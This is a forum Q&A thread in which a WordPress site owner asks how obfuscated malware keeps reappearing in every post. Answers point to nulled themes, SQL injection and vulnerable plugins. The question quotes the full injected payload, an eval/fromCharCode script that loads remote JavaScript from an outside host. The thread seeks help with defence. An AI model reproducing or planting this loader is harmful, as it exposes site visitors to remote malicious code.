# How does a virus infect my WordPress site?

Tags: wordpress, malware, virus

For the second time, I’m removing the Malware injection from posts on my WordPress site:

```
<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>
```

This code was inside every post.

Using the plugin **Better Search Repla**ce, I deleted all found inserts from all posts. No inserts were found in other database tables.

I checked the site for viruses using various plugins - such as **Wordfence**, etc. No infection results.

Only I work with sites. My computer is well protected. Checked with different anti-virus scanners - everything is clean!

I tried to find modified WordPress files as well as plugins. Purely! No suspicious files found!

**How to find the cause of infection?**

Answer (score 2):

There are 2 reasons why you are not able to remove jar.trafficbetter.biz malware from your WordPress site.

- you are using old, outdated nulled theme/child theme on your Wordpress site.
- the code was SQL injected to your database, and code is being populated on you site again and again.

these are a clever piece of code and cannot be detected by any antivirus,
 if you want to know what the code is doing use the following link.

https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html

So to solve the problem, change or update your theme to the latest version.

backup your database, and then search for the script in the database and remove the entry.

Comment: Thanks for the answer! I conducted a full-text search (jar.trafficbetter.biz) throughout the database, but no entries were found.
I had a copy of the entire site a year ago. Then there was definitely no virus. Made a comparison of all files - no changes! It turns out that no changes occurred in the files for the year.

Comment: I also tried looking for the entry "eval (String.fromCharCode" in all the files on the site - I didn’t find anything!
As a result, there are no traces in the database or in the files.

Comment: change the theme, if code appears on diffenent theme, let me know.

Comment: Sorry, but how do you imagine this? Change themes for a working site on the Internet? This is not possible, my client will not agree to this.

Comment: I've made changes to the answer, check the link to know more about the malware.

Answer (score 0):

Have you checked your plugins to see if any are unofficially abandoned or have an outstanding vulnerability? Quite often malware is introduced into the WordPress environment through plugins. The plugin would not usually add obfuscated code within the plugin's folder directly, because this easily shows you the route cause.

Recommend you check out a free service like https://app.patchstack.com (I have no affiliation) and locate the source of the issue which will be with one of your plugins.